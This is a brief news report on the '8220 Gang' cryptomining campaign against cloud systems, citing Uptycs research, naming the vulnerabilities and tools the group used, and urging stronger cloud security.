Recently, a group of hackers from China, known as “8220 Gang”, has intensified its attacks on cloud infrastructure, targeting both Linux and Windows users for illegal cryptocurrency mining.
The latest series of attacks, occurring from May 2023 to February 2024, demonstrate significant advancements in the tactics of the 8220 Gang and pose an increased threat to cloud security globally.
According to a recent report by Uptycs, the cybercriminals are exploiting well-known critical vulnerabilities such as CVE-2021-44228 (rated 10.0 on the CVSS scale) and CVE-2022-26134 (rated 9.8 on the CVSS scale) to breach cloud systems and gain unauthorized access.
Furthermore, the group has also targeted an older vulnerability in Oracle Weblogic-CVE-2017-3506, which allows them to remotely execute arbitrary commands and carry out malicious activities.
These attacks have wide-ranging implications for organizations that rely on cloud infrastructure for their operations. The evolving tactics of the 8220 Gang highlight the growing capabilities of cybercriminals and underscore the importance of increased vigilance and enhanced security measures.
The group utilizes tools like Tsunami, XMRIG, MASSCAN, and Spirit to conduct unauthorized cryptocurrency mining on compromised systems, posing significant risks to their integrity and performance.
As the 8220 Gang continues to refine its strategies, cybersecurity professionals must proactively identify and counter new threats to mitigate risks effectively.
It is crucial for organizations worldwide to prioritize cloud security and implement robust protection measures to safeguard their digital assets from groups like the 8220 Gang and similar attackers.